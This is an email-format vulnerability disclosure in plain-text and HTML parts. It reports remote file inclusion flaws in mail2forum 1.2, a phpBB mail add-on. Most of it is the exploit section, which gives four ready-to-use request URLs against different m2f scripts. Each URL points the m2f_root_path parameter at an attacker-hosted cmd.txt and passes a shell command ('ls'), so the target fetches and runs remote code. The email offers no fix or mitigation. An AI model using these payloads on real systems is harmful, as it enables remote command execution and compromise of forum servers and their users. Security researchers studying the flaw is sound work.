------=_Part_28928_1151264.1153174544672 Content-Type: text/plain; charset=ISO-8859-1; format=flowed Content-Transfer-Encoding: 7bit Content-Disposition: inline mail2forum <= 1.2 Multiple Remote File Include Vulnerabilities Discovered By OLiBekaS Affected software description : ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : mail for phpbb (bulletin board/forum software) version : latest version [ 1.2 ] URL : http://www.www.mail2forum.com Exploit : http://[target]/[forum_path]/m2f/m2f_phpbb204.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls http://[target]/[forum_path]/m2f/m2f_forum.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls http://[target]/[forum_path]/m2f/m2f_mailinglist.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls http://[target]/[forum_path]/m2f/m2f_cron.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls ------=_Part_28928_1151264.1153174544672 Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Content-Disposition: inline
Affected software description :
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Application : mail for phpbb (bulletin board/forum software)
version : latest version [ 1.2 ]
URL : http://www.www.mail2forum.com
Exploit :
http://[target]/[forum_path]/m2f/m2f_phpbb204.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls
http://[target]/[forum_path]/m2f/m2f_forum.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls
http://[target]/[forum_path]/m2f/m2f_mailinglist.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls
http://[target]/[forum_path]/m2f/m2f_cron.php?m2f_root_path=http://[attacker]/cmd.txt?&cmd=ls